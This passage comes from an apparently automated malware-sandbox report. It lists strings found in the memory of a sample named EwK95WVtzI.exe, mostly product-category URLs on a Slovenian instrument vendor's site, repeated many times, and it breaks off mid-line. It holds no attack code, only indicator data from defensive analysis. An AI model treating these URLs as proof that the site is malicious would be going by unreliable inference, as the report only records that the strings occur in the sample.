https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/merilni-pretvorniki-tlaka/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/montazni-pribor-za-merilnike-tlaka/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/procesni-pretvorniki-tlaka/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/rotronic-merilniki-diferencialnega-tlaka/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/sistemi-tlacnih-vmesnikov/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/tlacna-stikala/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/tlacni-vmesniki/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/ventili-in-zascitne-naprave-za-merilnike-tla
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-vlage/
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-vlage/comet-vlaga-dew-point-monitoring-kalibracija
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-vlage/michell-instruments-dew-point-merilniki-tock
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-vlage/prenosni-merilniki-vlage-temperature-in-atmo
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-vlage/rotronic-vlaga-aktivnost-vode-dew-point-moni
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/obnove-in-posodobitve-strojev-in-naprav/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/precizna-temperaturna-tipala/
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/prenosni-osebni-detektorji-wireless/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/prenosni-osebni-detektorji-wireless/vecih-plinov-prenosni-os
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/prenosni-osebni-detektorji/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 